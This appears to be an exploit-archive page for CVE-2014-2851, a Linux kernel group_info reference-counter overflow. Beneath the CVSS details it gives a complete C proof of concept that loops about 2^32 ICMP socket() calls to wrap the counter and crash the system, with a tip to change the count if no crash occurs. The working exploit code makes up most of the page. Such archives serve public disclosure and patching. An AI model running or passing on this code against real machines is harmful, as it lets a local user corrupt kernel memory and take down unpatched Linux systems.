Linux group_info Denial Of Service

2014.04.19
Credit: Thomas Pollet
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* * DoS poc for CVE-2014-2851 * Linux group_info refcounter overflow memory corruption * * https://lkml.org/lkml/2014/4/10/736 * * @Tohmaxx - http://thomaspollet.blogspot.be * * If the app doesn't crash your system, try a different count (argv[1]) * Execution takes a while because 2^32 socket() calls * */ #include <arpa/inet.h> #include <stdio.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int i ; struct sockaddr_in saddr; unsigned count = (1UL<<32) - 20 ; if(argc >= 2){ // Specify count count = atoi(argv[1]); } printf("count 0x%x\n",count); for(i = 0 ; (unsigned)i < count;i++ ){ socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); if ( i % ( 1 << 22 ) == 0 ) printf("%i \n",i); } //Now make it wrap and crash: system("/bin/echo bye bye"); }

References:

https://lkml.org/lkml/2014/4/10/736


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top